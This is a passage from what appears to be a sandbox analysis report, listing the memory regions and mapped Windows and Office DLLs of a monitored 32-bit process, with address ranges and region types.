end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 805 start_va = 0x13430000 end_va = 0x13438fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013430000" filename = "" Region: id = 806 start_va = 0x136a0000 end_va = 0x136a8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000136a0000" filename = "" Region: id = 807 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 808 start_va = 0x700c0000 end_va = 0x700c7fff monitored = 0 entry_point = 0x700c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 809 start_va = 0x66080000 end_va = 0x660e7fff monitored = 0 entry_point = 0x660a70a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 810 start_va = 0x137c0000 end_va = 0x137c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137c0000" filename = "" Region: id = 811 start_va = 0x137d0000 end_va = 0x137d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000137d0000" filename = "" Region: id = 885 start_va = 0x71960000 end_va = 0x71967fff monitored = 0 entry_point = 0x71961920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 886 start_va = 0x71910000 end_va = 0x71956fff monitored = 0 entry_point = 0x719258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 890 start_va = 0x6fef0000 end_va = 0x6ff53fff monitored = 0 entry_point = 0x6ff0afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 891 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 892 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 896 start_va = 0x137e0000 end_va = 0x137e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137e0000" filename = "" Region: id = 897 start_va = 0x6fee0000 end_va = 0x6feeffff monitored = 0 entry_point = 0x6fee4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 898 start_va = 0x6fec0000 end_va = 0x6fedffff monitored = 0 entry_point = 0x6fecd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 903 start_va = 0x6fe90000 end_va = 0x6febbfff monitored = 0 entry_point = 0x6feabb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 904 start_va = 0x13c30000 end_va = 0x13c30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c30000" filename = "" Region: id = 912 start_va = 0x13c30000 end_va = 0x13c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c30000" filename = "" Region: id = 913 start_va = 0x14430000 end_va = 0x1452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014430000" filename = "" Region: id = 914 start_va = 0x6fe70000 end_va = 0x6fe89fff monitored = 0 entry_point = 0x6fe7fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 917 start_va = 0x65f70000 end_va = 0x66079fff monitored = 0 entry_point = 0x65fd1e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 918 start_va = 0x6fe60000 end_va = 0x6fe67fff monitored = 0 entry_point = 0x6fe61d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 927 start_va = 0x137e0000 end_va = 0x137e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137e0000" filename = "" Region: id = 928 start_va = 0x13c70000 end_va = 0x13c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c70000" filename = "" Region: id = 947 start_va = 0x18490000 end_va = 0x1acc2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000018490000" filename = "" Region: id = 970 start_va = 0x137e0000 end_va = 0x137e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137e0000" filename = "" Region: id = 971 start_va = 0x13c70000 end_va = 0x13c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c70000" filename = "" Region: id = 1031 start_va = 0x71a40000 end_va = 0x71a6efff monitored = 0 entry_point = 0x71a55140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 1151 start_va = 0x137e0000 end_va = 0x137e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000137e0000" filename = "" Region: id = 1152 start_va = 0x13c70000 end_va = 0x13c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c70000" filename = "" Region: id = 1153 start_va = 0x13c80000 end_va = 0x13c9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013c80000" filename = "" Region: id = 1154 start_va = 0x13cc0000 end_va = 0x13cd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013cc0000" filename = "" Region: id = 1155 start_va = 0x16930000 end_va = 0x16e21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000016930000" filename = "" Region: id = 1156 start_va = 0x18490000 end_va = 0x187b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000018490000" filename = "" Region: id = 1157 start_va = 0x13ca0000 end_va = 0x13ca0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013ca0000" filename = "" Region: id = 1164 start_va = 0x137e0000 end_va = 0x137e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000137e0000" filename = "" Region: id = 1165 start_va = 0x14530000 end_va = 0x14630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1166 start_va = 0x14530000 end_va = 0x14630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1167 start_va = 0x14530000 end_va = 0x14630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1168 start_va = 0x137e0000 end_va = 0x137e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000137e0000" filename = "" Region: id = 1169 start_va = 0x14530000 end_va = 0x14630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1170 start_va = 0x14530000 end_va = 0x14630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1196 start_va = 0x13410000 end_va = 0x1341ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013410000" filename = "" Region: id = 1197 start_va = 0xb240000 end_va = 0xb24ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b240000" filename = "" Region: id = 1198 start_va = 0xb3a0000 end_va = 0xb3a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1199 start_va = 0xb540000 end_va = 0xb543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 1200 start_va = 0xb550000 end_va = 0xb553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b550000" filename = "" Region: id = 1201 start_va = 0xc670000 end_va = 0xc671fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c670000" filename = "" Region: id = 1202 start_va = 0xce80000 end_va = 0xce81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce80000" filename = "" Region: id = 1203 start_va = 0xf4b0000 end_va = 0xf524fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4b0000" filename = "" Region: id = 1204 start_va = 0xf530000 end_va = 0xf532fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f530000" filename = "" Region: id = 1205 start_va = 0xf540000 end_va = 0xf541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f540000" filename = "" Region: id = 1206 start_va = 0xf550000 end_va = 0xf551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f550000" filename = "" Region: id = 1207 start_va = 0xf560000 end_va = 0xf560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f560000" filename = "" Region: id = 1208 start_va = 0xf570000 end_va = 0xf571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f570000" filename = "" Region: id = 1209 start_va = 0xf580000 end_va = 0xf580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f580000" filename = "" Region: id = 1210 start_va = 0x11d00000 end_va = 0x11d01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d00000" filename = "" Region: id = 1211 start_va = 0x11d10000 end_va = 0x121e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d10000" filename = "" Region: id = 1212 start_va = 0x18490000 end_va = 0x1945ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000018490000" filename = "" Region: id = 1213 start_va = 0x65d90000 end_va = 0x65eabfff monitored = 0 entry_point = 0x65df74f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 1214 start_va = 0xb240000 end_va = 0xb240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b240000" filename = "" Region: id = 1215 start_va = 0xb3a0000 end_va = 0xb3a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1216 start_va = 0xb540000 end_va = 0xb541fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 1217 start_va = 0xb550000 end_va = 0xb551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b550000" filename = "" Region: id = 1218 start_va = 0xb9a0000 end_va = 0xb9a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9a0000" filename = "" Region: id = 1219 start_va = 0xb9b0000 end_va = 0xb9b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9b0000" filename = "" Region: id = 1220 start_va = 0xb9a0000 end_va = 0xb9c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 1221 start_va = 0x19460000 end_va = 0x1c07dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 1222 start_va = 0xb3a0000 end_va = 0xb3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1223 start_va = 0xb540000 end_va = 0xb54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 1224 start_va = 0xb3a0000 end_va = 0xb3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1225 start_va = 0xb540000 end_va = 0xb540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 1226 start_va = 0xb550000 end_va = 0xb552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b550000" filename = "" Region: id = 1227 start_va = 0xb9a0000 end_va = 0xb9b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9a0000" filename = "" Region: id = 1228 start_va = 0xb9c0000 end_va = 0xb9c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9c0000" filename = "" Region: id = 1229 start_va = 0xb9d0000 end_va = 0xb9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9d0000" filename = "" Region: id = 1230 start_va = 0xb9e0000 end_va = 0xb9e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9e0000" filename = "" Region: id = 1231 start_va = 0xb9f0000 end_va = 0xb9f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9f0000" filename = "" Region: id = 1232 start_va = 0xba00000 end_va = 0xba00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba00000" filename = "" Region: id = 1233 start_va = 0xba10000 end_va = 0xba12fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba10000" filename = "" Region: id = 1234 start_va = 0xba20000 end_va = 0xba20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba20000" filename = "" Region: id = 1235 start_va = 0xba30000 end_va = 0xba30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ba30000" filename = "" Region: id = 1236 start_va = 0xba40000 end_va = 0xbaa6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ba40000" filename = "" Region: id = 1237 start_va = 0xb9a0000 end_va = 0xba4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9a0000" filename = "" Region: id = 1238 start_va = 0xb9a0000 end_va = 0xba44fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9a0000" filename = "" Region: id = 1239 start_va = 0x11d10000 end_va = 0x11db5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011d10000" filename = "" Region: id = 1240 start_va = 0xb9a0000 end_va = 0xba9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9a0000" filename = "" Region: id = 1241 start_va = 0x65d30000 end_va = 0x65d86fff monitored = 0 entry_point = 0x65d65fc0 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\SysWOW64\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\syswow64\\photometadatahandler.dll") Region: id = 1242 start_va = 0x67510000 end_va = 0x6754ffff monitored = 0 entry_point = 0x6751f9d0 region_type = mapped_file name = "windowscodecsext.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecsExt.dll" (normalized: "c:\\windows\\syswow64\\windowscodecsext.dll") Region: id = 1243 start_va = 0x65cb0000 end_va = 0x65d2efff monitored = 0 entry_point = 0x65cbef20 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\SysWOW64\\mscms.dll" (normalized: "c:\\windows\\syswow64\\mscms.dll") Region: id = 1244 start_va = 0xb3a0000 end_va = 0xb3a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1245 start_va = 0x65c70000 end_va = 0x65cabfff monitored = 0 entry_point = 0x65c7af40 region_type = mapped_file name = "icm32.dll" filename = "\\Windows\\SysWOW64\\icm32.dll" (normalized: "c:\\windows\\syswow64\\icm32.dll") Region: id = 1246 start_va = 0x11dc0000 end_va = 0x12020fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dc0000" filename = "" Region: id = 1247 start_va = 0x12030000 end_va = 0x1213cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012030000" filename = "" Region: id = 1248 start_va = 0x12140000 end_va = 0x12246fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012140000" filename = "" Region: id = 1249 start_va = 0x12030000 end_va = 0x120f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012030000" filename = "" Region: id = 1250 start_va = 0x12250000 end_va = 0x12317fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012250000" filename = "" Region: id = 1251 start_va = 0x12320000 end_va = 0x12528fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012320000" filename = "" Region: id = 1252 start_va = 0xb3a0000 end_va = 0xb3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 1253 start_va = 0x12320000 end_va = 0x123f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012320000" filename = "" Region: id = 1254 start_va = 0x12400000 end_va = 0x124c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012400000" filename = "" Region: id = 1255 start_va = 0x13ef0000 end_va = 0x140f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ef0000" filename = "" Region: id = 1256 start_va = 0x12400000 end_va = 0x124d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012400000" filename = "" Region: id = 1257 start_va = 0x12250000 end_va = 0x1231dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012250000" filename = "" Region: id = 1258 start_va = 0x12250000 end_va = 0x12324fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012250000" filename = "" Region: id = 1259 start_va = 0x658d0000 end_va = 0x65c60fff monitored = 0 entry_point = 0x65b835b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 1260 start_va = 0x13ef0000 end_va = 0x142effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ef0000" filename = "" Region: id = 1261 start_va = 0xb250000 end_va = 0xb25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b250000" filename = "" Region: id = 1262 start_va = 0xb540000 end_va = 0xb54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 1263 start_va = 0xb550000 end_va = 0xb55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b550000" filename = "" Region: id = 1264 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 1265 start_va = 0xb550000 end_va = 0xb55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b550000" filename = "" Region: id = 1266 start_va = 0xbaa0000 end_va = 0xbaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000baa0000" filename = "" Region: id = 1267 start_va = 0x12030000 end_va = 0x1212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012030000" filename = "" Region: id = 1268 start_va = 0xbab0000 end_va = 0xbabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bab0000" filename = "" Region: id = 1269 start_va = 0xbac0000 end_va = 0xbacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bac0000" filename = "" Region: id = 1270 start_va = 0xbad0000 end_va = 0xbadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bad0000" filename = "" Region: id = 1271 start_va = 0xc670000 end_va = 0xc67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c670000" filename = "" Region: id = 1272 start_va = 0xce80000 end_va = 0xce8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce80000" filename = "" Region: id = 1273 start_va = 0xf4b0000 end_va = 0xf4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4b0000" filename = "" Region: id = 1274 start_va = 0xf4c0000 end_va = 0xf4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4c0000" filename = "" Region: id = 1275 start_va = 0xf4d0000 end_va = 0xf4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4d0000" filename = "" Region: id = 1276 start_va = 0x12330000 end_va = 0x123c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012330000" filename = "" Region: id = 1277 start_va = 0xc670000 end_va = 0xc67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c670000" filename = "" Region: id = 1278 start_va = 0xce80000 end_va = 0xce8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce80000" filename = "" Region: id = 1279 start_va = 0xf4b0000 end_va = 0xf4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4b0000" filename = "" Region: id = 1280 start_va = 0xf4c0000 end_va = 0xf4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4c0000" filename = "" Region: id = 1281 start_va = 0xf4d0000 end_va = 0xf4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4d0000" filename = "" Region: id = 1282 start_va = 0xc670000 end_va = 0xc67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c670000" filename = "" Region: id = 1283 start_va = 0xce80000 end_va = 0xce8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce80000" filename = "" Region: id = 1284 start_va = 0xf4b0000 end_va = 0xf4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4b0000" filename = "" Region: id = 1285 start_va = 0xf4c0000 end_va = 0xf4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4c0000" filename = "" Region: id = 1286 start_va = 0xf4d0000 end_va = 0xf4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4d0000" filename = "" Region: id = 1287 start_va = 0x123d0000 end_va = 0x124cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000123d0000" filename = "" Region: id = 1288 start_va = 0xf4e0000 end_va = 0xf4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4e0000" filename = "" Region: id = 1289 start_va = 0xf4f0000 end_va = 0xf4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4f0000" filename = "" Region: id = 1290 start_va = 0xf500000 end_va = 0xf50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f500000" filename = "" Region: id = 1291 start_va = 0xf510000 end_va = 0xf51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f510000" filename = "" Region: id = 1293 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 1294 start_va = 0xf520000 end_va = 0xf52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f520000" filename = "" Region: id = 1295 start_va = 0xf530000 end_va = 0xf53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f530000" filename = "" Region: id = 1296 start_va = 0xf570000 end_va = 0xf57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f570000" filename = "" Region: id = 1297 start_va = 0x12130000 end_va = 0x1213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012130000" filename = "" Region: id = 1298 start_va = 0x124d0000 end_va = 0x124dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124d0000" filename = "" Region: id = 1299 start_va = 0x124e0000 end_va = 0x124effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124e0000" filename = "" Region: id = 1300 start_va = 0x124f0000 end_va = 0x124fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124f0000" filename = "" Region: id = 1301 start_va = 0x12500000 end_va = 0x1250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012500000" filename = "" Region: id = 1302 start_va = 0x12510000 end_va = 0x1251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012510000" filename = "" Region: id = 1303 start_va = 0x12520000 end_va = 0x1252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012520000" filename = "" Region: id = 1304 start_va = 0x12530000 end_va = 0x1253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012530000" filename = "" Region: id = 1305 start_va = 0x12540000 end_va = 0x1254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012540000" filename = "" Region: id = 1307 start_va = 0x12130000 end_va = 0x1213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012130000" filename = "" Region: id = 1308 start_va = 0x124d0000 end_va = 0x124dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124d0000" filename = "" Region: id = 1309 start_va = 0x124e0000 end_va = 0x124effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124e0000" filename = "" Region: id = 1310 start_va = 0x124f0000 end_va = 0x124fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124f0000" filename = "" Region: id = 1311 start_va = 0x12500000 end_va = 0x1250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012500000" filename = "" Region: id = 1312 start_va = 0x12500000 end_va = 0x1250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012500000" filename = "" Region: id = 1313 start_va = 0x12510000 end_va = 0x1251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012510000" filename = "" Region: id = 1314 start_va = 0x12520000 end_va = 0x1252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012520000" filename = "" Region: id = 1315 start_va = 0x12530000 end_va = 0x1253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012530000" filename = "" Region: id = 1316 start_va = 0x12540000 end_va = 0x1254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012540000" filename = "" Region: id = 1317 start_va = 0x12550000 end_va = 0x1255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012550000" filename = "" Region: id = 1318 start_va = 0x12500000 end_va = 0x1250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012500000" filename = "" Region: id = 1319 start_va = 0x12550000 end_va = 0x1255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012550000" filename = "" Region: id = 1320 start_va = 0x12560000 end_va = 0x1256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012560000" filename = "" Region: id = 1321 start_va = 0x12570000 end_va = 0x1257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012570000" filename = "" Region: id = 1322 start_va = 0x12580000 end_va = 0x1258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012580000" filename = "" Region: id = 1323 start_va = 0x7fe60000 end_va = 0x7fe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 1324 start_va = 0x12500000 end_va = 0x1250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012500000" filename = "" Region: id = 1325 start_va = 0x12550000 end_va = 0x1255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012550000" filename = "" Region: id = 1326 start_va = 0x12560000 end_va = 0x1256ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012560000" filename = "" Region: id = 1327 start_va = 0x12570000 end_va = 0x1257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012570000" filename = "" Region: id = 1328 start_va = 0x12580000 end_va = 0x1258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012580000" filename = "" Region: id = 1329 start_va = 0x11dc0000 end_va = 0x11e26fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011dc0000" filename = "" Region: id = 1330 start_va = 0x12290000 end_va = 0x12329fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012290000" filename = "" Region: id = 1331 start_va = 0x12550000 end_va = 0x1261cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012550000" filename = "" Region: id = 1332 start_va = 0x14530000 end_va = 0x14739fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014530000" filename = "" Region: id = 1333 start_va = 0x17910000 end_va = 0x17b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017910000" filename = "" Region: id = 1334 start_va = 0x1c080000 end_va = 0x1c553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001c080000" filename = "" Region: id = 1335 start_va = 